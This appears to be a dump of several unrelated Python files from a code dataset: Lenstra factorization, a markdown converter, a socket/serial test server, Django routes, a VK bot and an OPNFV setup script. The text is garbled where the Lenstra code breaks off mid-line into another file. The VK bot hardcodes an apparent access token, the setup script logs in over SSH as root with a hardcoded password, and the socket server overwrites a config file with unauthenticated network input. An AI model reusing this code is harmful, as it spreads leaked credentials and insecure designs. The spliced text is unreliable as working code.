count+=1+1+1+1+1+1+1 # if ( P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == -Q[1]%Fp): \r\n if ( P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == -Q[1]%Fp): \r\n return 'O',count\r\n \r\n # Si x1 = x2 && y1 = y2 => P = Q \r\n count+=1+1+1+1+1+1+1 # if (P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == Q[1]%Fp): \r\n if (P[0]%Fp == Q[0]%Fp) and ( P[1]%Fp == Q[1]%Fp): \r\n \r\n a=randint(2,Fp-1)\r\n \r\n # m= (3*x1² + a) / 2y1\r\n num= ( (3*(P[0]**2) )+ a )%Fp\r\n \r\n ### Renvoie Inverse de denom ou retourne denom si il n'a pas d'inverse (utile pr Lenstra)\r\n \r\n # Euclide Etendu \r\n denom=2*P[1]\r\n count+=1 # P[1]\r\n g,x,y,c=extended_gcd(denom,Fp)\r\n count+=c # extended_gcd(denom,Fp)\r\n count+=1 #if(g!=1):\r\n if(g!=1):\r\n #print(\"Pas d inverse pour : \"+str(denom)+\"%\"+str(Fp))\r\n return [denom,'No Inverse'],count ### Lenstra retourne d \r\n \r\n #On inverse denom si il a un inverse\r\n denom_inv=(x%Fp)\r\n \r\n m=num*denom_inv\r\n \r\n # x3 = m²-2x1\r\n x3=( (m**2)-2*P[0]) %Fp \r\n count+=1 # P[0]\r\n \r\n # Si x1 != x2 && y1!=y2 => P != Q \r\n else :\r\n # m=(y2-y1)/(x2-x1)\r\n num=( Q[1] - P[1])%Fp\r\n count+=1+1 # Q[1] P[1]\r\n \r\n ### Renvoie Inverse de denom ou retourne denom si il n'a pas d'inverse (utile pr Lenstra) \r\n # Euclide Etendu \r\n count+=1+1 # Q[0] - P[0]\r\n denom=Q[0] - P[0]\r\n g,x,y,c=extended_gcd(denom,Fp)\r\n count+=c # extended_gcd(denom,Fp)\r\n count+=1 #if(g!=1):\r\n if(g!=1):\r\n #print(\"Pas d inverse pour : \"+str(denom)+\"%\"+str(Fp))\r\n return [denom,'No Inverse'],count\r\n \r\n #On inverse denom si il a un inverse \r\n denom_inv=(x%Fp)\r\n \r\n m=num*denom_inv\r\n \r\n # x3 = m²-x1-x2\r\n count+=1+1 # P[0]-Q[0] ) \r\n x3 =( (m**2)-P[0]-Q[0] ) \r\n\r\n # (x3, -y1 + m*(x1-x3) )\r\n count+=1+1 # P[0] - x3 ) - P[1])\r\n return ([ x3%Fp ,( m *( P[0] - x3 ) - P[1]) %Fp]),count\r\n\r\n\r\n# Test For Addition \r\n\"\"\"\r\nprint(\"Test Addition \")\r\n\r\na=2\r\nFp=97\r\n\r\nP=[15,6]\r\nQ=[5,9]\r\n\r\nprint(\"Coord use : P = \"+str(P)+\" , Q = \"+str(Q)+\" , n = \"+str(Fp) )\r\nprint(Addition_Point(P,Q,Fp) )\r\nprint(\"\")\r\n\r\n\r\n# No inversible\r\nP=[2,11]\r\nQ=[2,11]\r\nFp=36\r\nprint(\"No Inversible Test for lenstra\")\r\nprint(\"Coord use : P = \"+str(P)+\" , Q = \"+str(Q)+\" , n = \"+str(Fp) )\r\nprint(Addition_Point(P,Q,Fp) )\r\nprint(\"\")\r\n\r\nprint(\"Test 
Inversible\")\r\nprint(modinv(3,Fp))\r\nprint(\"\")\r\n\"\"\"\r\n\r\n#----------------------------------------------------------------\r\n\r\n#----------------------------------------------------------------\r\n\r\n\r\n#%%\r\n# Multiplication nP (Addition nP = P + P + P + ... + P n fois)\r\ndef Multiplication_Points(n,P,Fp):\r\n result = 'O'\r\n pow_2P = P\r\n count=0\r\n while(n!=0): \r\n count+=1 # while(n !=0):\r\n count+=1+1 # if(pow_2P[1]!='No Inverse'):\r\n \r\n if(pow_2P[1]!='No Inverse'):\r\n if (n%2==1):\r\n res = Addition_Point( pow_2P , result,Fp)\r\n\r\n result=res[0]\r\n\r\n count+=res[1]\r\n count+=1+1 #if(result[1]=='No Inverse'):\r\n if(result[1]=='No Inverse'):\r\n return result,count\r\n res=Addition_Point( pow_2P , pow_2P,Fp)\r\n pow_2P =res[0]\r\n count+=res[1]\r\n #print(\"n = \"+str(n))\r\n #print(\"pow_2P = \"+str(pow_2P))\r\n #print(\"result = \"+str(result))\r\n #print(\"\")\r\n n=n//2\r\n else:\r\n return pow_2P,count\r\n \r\n return result,count\r\n\r\n\"\"\"\r\nprint(\"Test Mult No inverse\")\r\nprint(Multiplication_Points(2,P,Fp))\r\nprint(\"\")\r\n\"\"\"\r\n\r\n\"\"\"\r\nprint(\"Test Multiplication nP\")\r\nprint(\"\")\r\n\r\na=2\r\nb=3\r\nn=4\r\nFp=1999\r\nP=[3,6]\r\n\r\nprint(\"Values are : n = \"+str(n)+\" , a = \"+str(a)+\" , Fp = \"+str(Fp)+\" , P = \"+str(P))\r\nprint(\"nP value is : \"+str(Multiplication_Points(n,P,Fp) ) )\r\n\r\n\"\"\"\r\n\r\n\r\n# Algorithme Crible Erasthothène \r\n# Retourne la liste de tous les nombres premiers <= n\r\ndef Erasthothene(n):\r\n count=0\r\n # créer une liste l de 2 à n \r\n L=list(range(2,n+1))\r\n count+=1\r\n \r\n i=2\r\n \r\n while(i<=np.sqrt(n)):\r\n count+=1\r\n # Si i dans la liste, sinn supprimer ses multiples\r\n count+=1\r\n if(i in L):\r\n #j donne des multiples de i, on commence de 2*i et on incrémente i par i (exemple i=2 on fait +2)\r\n for j in range(i*2,n+1,i):\r\n #Suppression des multiples s'ils sont trouvés dans la liste\r\n count+=1\r\n if(j in L):\r\n count+=1\r\n L.remove(j)\r\n i=i+1\r\n count+=1\r\n return L,count\r\n#%%\r\n\r\nlenstra_list_factor=[]\r\n#----------------------------------------------------------------------\r\n#------- ALGO LENSTRA ------------ \r\n#---------------------------------------------------------------------- \r\ndef Lenstra(n,B,count):\r\n \r\n # 1) Vérifier que :\r\n # n est pas premier\r\n count+=1\r\n if(NombrePremier(n)[0]==True):\r\n return n,count\r\n \r\n # n n'est pas divisible par 2\r\n count+=1\r\n if(n%2==0):\r\n return 2,count\r\n \r\n # n n'est pas divisible par 3\r\n count+=1\r\n if(n%3==0):\r\n return 3,count\r\n \r\n \r\n if(B<2):\r\n #print(\"B : \"+str(B))\r\n print(\"Algo Fail ! \")\r\n return lenstra_list_factor,count\r\n \r\n \r\n # 2) Choisir des entiers aléatoires a,x,y entre 1 et n\r\n RandomOk=False\r\n while(RandomOk==False):\r\n count+=1\r\n Steptwo=False\r\n x,y=randint(1,n-1),randint(1,n-1)\r\n \r\n while(Steptwo==False):\r\n count+=1\r\n \r\n a=randint(1,n-1)\r\n print(\"a : \"+str(a))\r\n print(\"x : \"+str(x))\r\n print(\"y : \"+str(y))\r\n \r\n \r\n \r\n # 3) Calculer b = y**2 − x**3 − a*x (mod n).\r\n b= (pow(y,2)-pow(x,3)-a*x) %n\r\n print(\"b : \"+str(b))\r\n print(\"\")\r\n # 4) Calculer d= pgcd(4a**3 + 27b**2, n)\r\n f=int(4*pow(a,3) + 27*pow(b,2))%n\r\n #print(f)\r\n d=np.gcd(f,n)\r\n print(\"d : \"+str(d))\r\n count+=1+1\r\n # Si 1br '):\n outLines.append('

<p>%s</p>
' % line[4:])\n else:\n outLines.append(line)\n\n return outLines\n\n def intPutConsole(self, text):\n print(text)\n\n def getTime(self):\n now = datetime.now()\n return now.isoformat(' ')[0:19]\n\n\nclass DocumentElement:\n outstandingSubstitutions = True\n substitutions = {}\n elements = []\n inDirName = ''\n fileName = ''\n parentDocumentElement = None\n globalSymbols = False\n\n def __init__(self, globalSymbols=False):\n self.outstandingSubstitutions = True\n self.substitutions = {}\n self.elements = []\n self.inDirName = ''\n self.parentDocumentElement = None\n self.globalSymbols = globalSymbols\n\n def handleLines(self, lines, consPrint, statusPrint):\n ignoreMode = False\n setBlockMode = False\n multiLineSymbolValue = []\n multiLineSymbolName = ''\n for lFull in lines:\n line = self.stripNewLine(lFull)\n words = line.split()\n if ignoreMode:\n if line.startswith('>/ignore'):\n ignoreMode = False\n continue\n if setBlockMode:\n if line.startswith('>/setblock'):\n self.storeSubstitutionValue(multiLineSymbolName, multiLineSymbolValue)\n multiLineSymbolValue = []\n multiLineSymbolName = ''\n setBlockMode = False\n else:\n multiLineSymbolValue.append(line)\n else:\n if line.startswith('>set '):\n lineRemainder = ''\n for i in range(2, len(words)):\n if i > 2:\n lineRemainder += ' '\n lineRemainder += words[i]\n\n self.storeSubstitutionValue(words[1], lineRemainder)\n else:\n if line.startswith('>setblock'):\n multiLineSymbolName = words[1]\n setBlockMode = True\n else:\n if line.startswith('>#'):\n pass\n else:\n if line.startswith('>ignore'):\n ignoreMode = True\n else:\n self.elements.append(line)\n\n def substituteSymbols(self, consPrint, statusPrint):\n self.outstandingSubstitutions = False\n i = 0\n while i < len(self.elements):\n line = self.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>sub'):\n substitutionString = self.lookupSymbol(words[1])\n if len(substitutionString) < 1:\n consPrint('Symbol %s not defined' % words[1])\n self.outstandingSubstitutions = True\n else:\n if isinstance(substitutionString, str):\n if len(words) > 2:\n self.elements[i] = substitutionString + words[2]\n else:\n self.elements[i] = substitutionString\n else:\n del self.elements[i]\n for l in substitutionString:\n self.elements.insert(i, l)\n i += 1\n\n else:\n if isinstance(line, DocumentElement):\n line.substituteSymbols(consPrint, statusPrint)\n if line.outstandingSubstitutions == True:\n self.outstandingSubstitutions = True\n else:\n consPrint('DocumentElement element of unknown type: %s.' 
% type(line).__name__)\n i += 1\n\n def getLines(self):\n return self.elements\n\n def getTime(self):\n now = datetime.now()\n return now.isoformat(' ')[0:19]\n\n def lookupSymbol(self, symbol):\n result = self.substitutions.get(symbol, '')\n if len(result) > 0:\n return result\n else:\n pDE = self.parentDocumentElement\n if isinstance(pDE, DocumentElement):\n result = pDE.lookupSymbol(symbol)\n if len(result) > 0:\n return result\n else:\n return ''\n else:\n return ''\n\n def stripNewLine(self, line):\n if len(line) > 0:\n if '\\n' == line[(-1)]:\n return line[0:-1]\n return line\n\n def storeSubstitutionValue(self, symbolName, symbolValue):\n if self.globalSymbols:\n parent = self\n while parent != None:\n parentPrevious = parent\n parent = parent.parentDocumentElement\n parentPrevious.substitutions[symbolName] = symbolValue\n\n else:\n self.substitutions[symbolName] = symbolValue\n\n def printElements(self, recurseDepth):\n print('printElements() starting, %d elements, recurse depth: %d...' % (len(self.elements), recurseDepth))\n for line in self.elements:\n if isinstance(line, str):\n print('Str: %s' % line)\n else:\n if isinstance(line, DocumentElement):\n print('DocumentElement child begin:')\n line.printElements(recurseDepth + 1)\n print('DocumentElement child end.')\n else:\n print('DocumentElement element of unknown type: %s.' % type(line).__name__)\n\n print('printElements: substitutions:')\n for key in self.substitutions.keys():\n print('Key %s: %s' % (key, self.substitutions.get(key)))\n\n def writeElements(self, f, elements, consPrint, statusPrint):\n for line in elements:\n if isinstance(line, str):\n f.write('%s\\n' % line)\n else:\n if isinstance(line, DocumentElement):\n line.writeElements(f, line.elements, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n\n\nclass SimpleConversions:\n\n def transform(self, documentElement, consPrint, statusPrint):\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n replacementString = ''\n if line.startswith('>datetime'):\n replacementString = datetime.now().isoformat(' ')[0:19]\n else:\n if line.startswith('>date'):\n replacementString = datetime.now().isoformat(' ')[0:10]\n else:\n if line.startswith('>time'):\n replacementString = datetime.now().isoformat(' ')[11:19]\n else:\n if line.startswith('>br'):\n words = line.split()\n l = words[0]\n if len(l) == 3:\n replacementString = '
<br/>'\n                                else:\n                                    repetitionNoString = l[3:]\n                                    if repetitionNoString.isnumeric():\n                                        repetitionNo = int(repetitionNoString)\n                                        while repetitionNo > 0:\n                                            replacementString += '<br/>
'\n repetitionNo -= 1\n\n if len(replacementString) > 0:\n words = line.split()\n wordCount = 0\n for word in words:\n if wordCount == 1:\n replacementString += word\n if wordCount > 1:\n replacementString += ' ' + word\n wordCount += 1\n\n documentElement.elements[i] = replacementString\n else:\n if isinstance(line, DocumentElement):\n simpleConversions = SimpleConversions()\n simpleConversions.transform(line, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n\nclass TableConversion:\n\n def __init__(self):\n pass\n\n def produceSymbolicNumbers(self, documentElement, consPrint, statusPrint):\n tableRowCounter = 0\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>cell'):\n if len(words) > 1:\n command = words[1]\n if command.startswith('*'):\n if command == '*start':\n tableRowCounter = 1\n documentElement.elements[i] = '>cell %s' % tableRowCounter\n else:\n if command == '*incr':\n tableRowCounter += 1\n documentElement.elements[i] = '>cell %s' % tableRowCounter\n if len(words) > 2:\n symbol = words[2]\n documentElement.substitutions[symbol] = '%d' % tableRowCounter\n else:\n if isinstance(line, DocumentElement):\n self.produceSymbolicNumbers(line, consPrint, statusPrint)\n else:\n consPrint('DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def convertTable(self, documentElement, consPrint, statusPrint):\n currColNo = 0\n noOfCols = 0\n cellContents = ''\n rowContents = ''\n caption = ''\n tableNo = 0\n tableMode = False\n linesIn = []\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if tableMode:\n del documentElement.elements[i]\n i -= 1\n if len(line.strip()) < 1 or line.startswith('>/row'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n if noOfCols > 0:\n while currColNo < noOfCols:\n rowContents += ' |'\n currColNo += 1\n\n if len(rowContents) > 0:\n linesIn.append(rowContents)\n linesIn.append('')\n rowContents = ''\n if line.startswith('>/row'):\n caption = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j == 1:\n if words[j].strip() == '*tableno':\n tableNo += 1\n else:\n caption += words[j].strip()\n else:\n caption += ' '\n caption += words[j].strip()\n\n if tableNo > 0:\n linesIn.append('**Table %d: %s**' % (tableNo, caption))\n else:\n linesIn.append('**%s**' % caption)\n for line in linesIn:\n i += 1\n documentElement.elements.insert(i, line)\n\n currColNo = 0\n tableMode = False\n linesIn = []\n else:\n if line.startswith('>row'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n if noOfCols > 0:\n while currColNo < noOfCols:\n rowContents += ' |'\n currColNo += 1\n\n linesIn.append(rowContents)\n rowContents = '|'\n currColNo = 0\n else:\n if line.startswith('>cell'):\n savedContents = self.closeCell(cellContents)\n cellContents = ''\n if len(savedContents) > 0:\n rowContents += savedContents\n lineRemainder = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j > 1:\n lineRemainder += ' '\n lineRemainder += words[j].strip()\n\n cellContents = lineRemainder\n else:\n cellContents = ' '\n currColNo += 1\n else:\n if len(cellContents) > 0:\n if cellContents == ' ':\n cellContents = ''\n 
else:\n cellContents += ' '\n else:\n cellContents += line.strip()\n elif line.startswith('>row'):\n del documentElement.elements[i]\n i -= 1\n cellContents = ''\n tableMode = True\n if len(words) > 1:\n noOfCols = int(words[1])\n else:\n noOfCols = 0\n currColNo = 0\n rowContents = '|'\n else:\n if isinstance(line, DocumentElement):\n tableConversion = TableConversion()\n tableConversion.convertTable(line, consPrint, statusPrint)\n else:\n consPrint('TableConversion: DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def closeCell(self, cellContents):\n if len(cellContents) == 0:\n return ''\n else:\n return cellContents + '|'\n\n\nclass OrderedListConversion:\n\n def __init__(self):\n pass\n\n def produceSymbolicNumbers(self, documentElement: DocumentElement, consPrint, statusPrint):\n listItemCounter = 0\n i = 0\n insideListItem = False\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>li'):\n insideListItem = True\n if len(words) > 1:\n command = words[1]\n if command.startswith('*'):\n if command == '*start':\n listItemCounter = 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n else:\n if command == '*incr':\n listItemCounter += 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n if len(words) > 2:\n symbol = words[2]\n documentElement.substitutions[symbol] = '%d' % listItemCounter\n else:\n listItemCounter += 1\n documentElement.elements[i] = '%s. %s' % (listItemCounter, self.fetchRemainder(words))\n else:\n listItemCounter += 1\n documentElement.elements[i] = '%s. ' % listItemCounter\n else:\n if line.startswith('>/li'):\n insideListItem = False\n del documentElement.elements[i]\n i -= 1\n else:\n if insideListItem:\n documentElement.elements[(i - 1)] += line\n del documentElement.elements[i]\n i -= 1\n insideListItem = False\n else:\n if isinstance(line, DocumentElement):\n self.produceSymbolicNumbers(line, consPrint, statusPrint)\n else:\n consPrint('OrderedListConverision: DocumentElement element of unknown type: %s.' % type(line).__name__)\n i += 1\n\n def convertOrderedList(self, documentElement: DocumentElement, consPrint, statusPrint):\n orderedListMode = False\n linesIn = []\n i = 0\n while i < len(documentElement.elements):\n line = documentElement.elements[i]\n if isinstance(line, str):\n words = line.split()\n if line.startswith('>li'):\n linesIn.append(self.fetchRemainder(words))\n else:\n if line.startswith('>/li'):\n pass\n else:\n linesIn.append(line)\n else:\n if isinstance(line, DocumentElement):\n orderedListConversion = OrderedListConversion()\n orderedListConversion.convertOrderedList(line, consPrint, statusPrint)\n else:\n consPrint('OrderedListConversion: DocumentElement element of unknown type: %s.' 
% type(line).__name__)\n i += 1\n\n def fetchRemainder(self, words):\n lineRemainder = ''\n if len(words) > 1:\n for j in range(1, len(words)):\n if j > 1:\n lineRemainder += ' '\n lineRemainder += words[j].strip()\n\n return lineRemainder","sub_path":"pycfiles/tagtomarkdown-0.4.0-py3.6/tagtomarkdown.cpython-36.py","file_name":"tagtomarkdown.cpython-36.py","file_ext":"py","file_size_in_byte":21355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596790067","text":"import asyncio\nimport socket\nimport os\nimport xml.dom.minidom as minidom\nimport xml.etree.ElementTree as ET\nfrom threading import Thread\nimport time\nfrom datetime import datetime, timedelta\nimport serial\nimport struct\n\nDEBUG_XML = False\nDEBUG_REDE = True\nDEBUG_TIME = True\n\nser = serial.Serial(\n port='/dev/ttyS0',\n baudrate =9600, \n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1)\n\n\nff = struct.pack('B', 0xff)\n\nfile_config = 'ConfigM.xml'\n\nfull_file = os.path.abspath(os.path.join('data'))\n\n\narq_config = os.path.abspath(os.path.join('data', file_config))\n\nif DEBUG_XML:\n xmlConfig = minidom.parse(arq_config)\n listaOperadoresXml = xmlConfig.getElementsByTagName('operador')\n listaOperadores = []\n for operador in listaOperadoresXml:\n listaOperadores.append(operador.firstChild.nodeValue)\n\n print(listaOperadores)\n\n tela = 0\n\n tela = tela + 1 if False else tela - 1\n print(tela)\n\n\nif DEBUG_REDE:\n PORTA_BASE_PADRAO = 32000\n MAQUINA = 2\n PORT = PORTA_BASE_PADRAO + MAQUINA\n class Server(Thread):\n def __init__(self):\n Thread.__init__(self)\n #self.daemon = True\n self.start()\n def run(self):\n while True:\n print('A')\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1 )\n HOST = socket.gethostname()\n sock.bind((HOST, PORT))\n sock.listen()\n\n client, addr = sock.accept()\n\n with client:\n print('Connectado a', addr)\n btipo = client.recv(1)\n tipo = btipo.decode(\"utf-8\")\n if btipo is 'c' or 'p': # c = config (ou seja, receber info de maquina), p = prod/paradas (ou seja, enviar xmls)\n client.send(btipo) # echo\n if tipo is 'c':\n stream = client.recv(1024000)\n root = ET.fromstring(stream)\n with open(arq_config,'w') as arq:\n arq.write(ET.tostring(root).decode())\n else:\n xmlStream = ET.parse(arq_paradas)\n xmlstr = ET.tostring(xmlStream.getroot()).decode()\n client.send(bytes(xmlstr, \"utf-8\"))\n\n xmlStream = ET.parse(arq_prod)\n xmlstr = ET.tostring(xmlStream.getroot()).decode()\n client.send(bytes(xmlstr, \"utf-8\"))\n else:\n print('Erro!')\n \n\n \n\nif DEBUG_REDE:\n Server()\n\n #while True:\n # pass\n\n\nif DEBUG_TIME:\n class TimeRTC(Thread):\n def __init__(self):\n Thread.__init__(self)\n #self.daemon = True\n self.start()\n def run(self):\n while True:\n startTempo = datetime.now()\n while datetime.now() - startTempo < timedelta(seconds=.1):\n pass\n \n now = datetime.now()\n second = '{:02d}'.format(now.second)\n second = str(second)\n minute = '{:02d}'.format(now.minute)\n minute = str(minute)\n hour = '{:02d}'.format(now.hour)\n hour = str(hour)\n \n tempo = hour + ':' + minute + ':' + second\n tempo = bytes('\"'+str(tempo)+'\"', encoding='iso-8859-1')\n \n ser.write(b't1.txt=')\n ser.write(tempo)\n ser.write(ff+ff+ff)\n \n x = ser.readlines()\n print(x)\n if x:\n print('A')\n for y in x:\n _, sinal, _ = str(y).split(\"'\")\n print(sinal)\n sinal = sinal.replace('\\\\xff\\\\xff\\\\xff', 
'')\n                        print(sinal)\n                        e, info1, info2, info3 = sinal.split('\\\\x')\n                        print(info2)\n\n\nif DEBUG_TIME:\n    TimeRTC()\n\n    ","sub_path":"TestezinhoCiex.py","file_name":"TestezinhoCiex.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"146384177","text":"from django.contrib import admin\nfrom django.urls import path ,include\nfrom books.views import *\n\n\napp_name = 'books'\n\nurlpatterns = [\n    path('', home,name='home'),\n    \n    # Author\n    \n    path('author/',AuthorListView.as_view(),name='authorlist'),\n    path('author/add/',AuthorCreateView.as_view(),name=\"authoradd\"),\n    path('author/<int:pk>/update/',AuthorUpdateView.as_view(),name=\"authorupdate\"),\n    path('author/<int:pk>/delete/',AuthorDeleteView.as_view(),name=\"authordelete\"), \n    path('author/<int:pk>/',AuthorDetail,name=\"authordetail\"),\n    \n    \n    # Book\n    path('book/',BooksListView.as_view(),name='booklist'),\n    path('book/add/',BookCreateView.as_view(),name='bookcreate'),\n    path('book/<int:pk>/delete/',BookDeleteView.as_view(),name=\"bookdelete\"),\n    path('book/<int:pk>/update/',BookUpdateView.as_view(),name=\"bookupdate\"),\n    path('book/<int:pk>/',BooksDetailView.as_view(),name=\"bookdetail\"),\n    \n    # TBR\n    path('readinglist/',TBRListView.as_view(),name='tbrlist'),\n    path('readinglist/add/',TBRCreate.as_view(),name='tbrcreate'),\n    path('readinglist/<int:pk>/update/',TBRUpdate.as_view(),name='tbrupdate'),\n    path('readinglist/<int:pk>/delete/',TBRDelete.as_view(),name='tbrdelete'),\n    path('readinglist/<int:pk>/',TBRDetail,name='tbrdetail'),\n    \n    # Genre\n    path('genre/',GenreListView.as_view(),name=\"genrelist\"),\n    path('genre/add/',GenreCreateView.as_view(),name=\"genrecreate\"),\n    path('genre/<int:pk>/update/',GenreUpdateView.as_view(),name=\"genreupdate\"),\n    path('genre/<int:pk>/delete/',GenreDeleteView.as_view(),name=\"genredelete\"),\n    path('genre/<int:pk>/',GenreDetail,name=\"genredetail\"),\n\n    # Batch Process\n    path('batchupload/',batchprocess,name=\"batchload\"),\n    \n    #Search\n    path('search/',Search.as_view(),name=\"search\"),\n    \n    ]\n","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"141145218","text":"import vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nfrom vk_api.utils import get_random_id\n\ndef send_message(sender, message):\n    authorize.method('messages.send', {'user_id': sender, 'message': message, 'random_id': get_random_id()})\n\n#last = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\npeople = []\n\ntoken = \"0c8eafaca1234de0b8a7d6dee3092bb1a7b9bc3797795d35a7f5f56cf2377f7239a33e08445ddbe19cfae\"\nauthorize = vk_api.VkApi(token=token)\nlongpoll = VkLongPoll(authorize)\n\nfor event in longpoll.listen():\n    if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n        nikita = 320331416\n        tim = 472247625\n        dima = 232515926\n        stas = 229459286\n        received_message = event.text\n        rm = received_message.lower()\n        sender = event.user_id\n        if rm[:12] == \"набор старт \":\n            count = int(rm[12:])\n            i = 0\n            people = []\n            send_message(nikita, \"Набор на тренировку начался\") \n            send_message(dima, \"Набор на тренировку начался\")\n            send_message(tim, \"Набор на тренировку начался\")\n            send_message(stas, \"Набор на тренировку начался\")\n        if rm == \"список\":\n            itog1 = \"\"\n            a1 = 0\n            for i in range(len(people)):\n                itog1 += '{}. 
'.format(a1 + 1) + people[a1] + \"\\n\"\n                a1 += 1\n            if itog1 != \"\":\n                send_message(dima, itog1)\n                send_message(tim, itog1)\n                send_message(nikita, itog1)\n                send_message(stas, itog1)\n            else:\n                send_message(dima, \"Список пуст\")\n                send_message(tim, \"Список пуст\")\n                send_message(nikita, \"Список пуст\")\n                send_message(stas, \"Список пуст\")\n        if rm[:6] == 'секция':\n            false = 0\n            for i in range(len(people)):\n                if received_message[7:] == people[i]:\n                    send_message(sender, \"Ты уже есть в списках!\")\n                    false = 1\n                    break\n                else:\n                    i += 1\n                if i == count:\n                    send_message(sender, \"⚠ Упс...\\n\\n• Набор на ДАННУЮ тренировку закончен, мест больше нет!\\n\\n✅ Следите за информацией о новых тренировках в группе секции: vk.com/basketball_in_mirea\")\n                    false = 1\n            if false != 1:\n                if i == len(people):\n                    people.append(received_message[7:])\n                    send_message(sender, \"Твой порядковый номер: {}\".format(i + 1))\n                    a = 0\n                    itog = \"\"\n                    for i in range(len(people)):\n                        itog += '{}. '.format(i + 1) + people[a] + \"\\n\"\n                        a += 1\n                        if i == (count - 1):\n                            send_message(dima, itog)\n                            send_message(tim, itog)\n                            send_message(nikita, itog)\n                            send_message(stas, itog)\n","sub_path":"basketbot.py","file_name":"basketbot.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"301198251","text":"\n\nfrom xai.brain.wordbase.nouns._dentist import _DENTIST\n\n#class header\nclass _DENTISTS(_DENTIST, ):\n\tdef __init__(self,): \n\t\t_DENTIST.__init__(self)\n\t\tself.name = \"DENTISTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"dentist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_dentists.py","file_name":"_dentists.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"334090399","text":"#\n# Author: George Paraskevopoulos (geopar@intracom-telecom.com)\n#         Manuel Buil (manuel.buil@ericsson.com)\n# Prepares the controller and the compute nodes for the odl-sfc testcase\n#\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n\nimport os\nimport paramiko\nimport subprocess\nimport sys\n\nimport functest.utils.functest_logger as ft_logger\n\n\nlogger = ft_logger.Logger(__name__).getLogger()\n\nSFC_REPO_DIR = \"/home/opnfv/repos/sfc\"\n\ntry:\n    INSTALLER_IP = os.environ['INSTALLER_IP']\nexcept:\n    logger.debug(\"INSTALLER_IP does not exist. 
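The OPNFV setup script in this record guards its environment lookup with a bare try/except and drives shell commands through subprocess.Popen followed by manual poll()/wait()/returncode checks. Both patterns can be written more compactly, as in the sketch below; it is illustrative only, with a placeholder command rather than the script's real presetup call.

import os
import subprocess

# os.environ.get with a default replaces the try/except around the lookup.
installer_ip = os.environ.get('INSTALLER_IP', '10.20.0.2')

# subprocess.run waits for the child and exposes returncode/stdout directly,
# so no manual poll()/wait() dance is needed.
result = subprocess.run('echo placeholder-for-presetup-command',  # hypothetical command
                        shell=True, capture_output=True, text=True)
if result.returncode != 0:
    raise SystemExit(result.returncode)
print(result.stdout.strip())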
We create 10.20.0.2\")\n INSTALLER_IP = \"10.20.0.2\"\n\nos.environ['ODL_SFC_LOG'] = \"/home/opnfv/functest/results/sfc.log\"\nos.environ['ODL_SFC_DIR'] = os.path.join(SFC_REPO_DIR,\n \"sfc/tests/functest\")\nSETUP_SCRIPTS_DIR = os.path.join(os.environ['ODL_SFC_DIR'], 'setup_scripts')\n\ncommand = SETUP_SCRIPTS_DIR + (\"/server_presetup_CI.bash | \"\n \"tee -a ${ODL_SFC_LOG} 1>/dev/null 2>&1\")\n\noutput = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n\n# This code is for debugging purposes\n# for line in iter(output.stdout.readline, ''):\n# i = line.rstrip()\n# print(i)\n\n# Make sure the process is finished before checking the returncode\nif not output.poll():\n output.wait()\n\n# Get return value\nif output.returncode:\n print(\"The presetup of the server did not work\")\n sys.exit(output.returncode)\n\nlogger.info(\"The presetup of the server worked \")\n\nssh_options = \"-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no\"\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\ntry:\n ssh.connect(INSTALLER_IP, username=\"root\",\n password=\"r00tme\", timeout=2)\n command = \"fuel node | grep compute | awk '{print $10}'\"\n logger.info(\"Executing ssh to collect the compute IPs\")\n (stdin, stdout, stderr) = ssh.exec_command(command)\nexcept:\n logger.debug(\"Something went wrong in the ssh to collect the computes IP\")\n\noutput = stdout.readlines()\nfor ip in output:\n command = 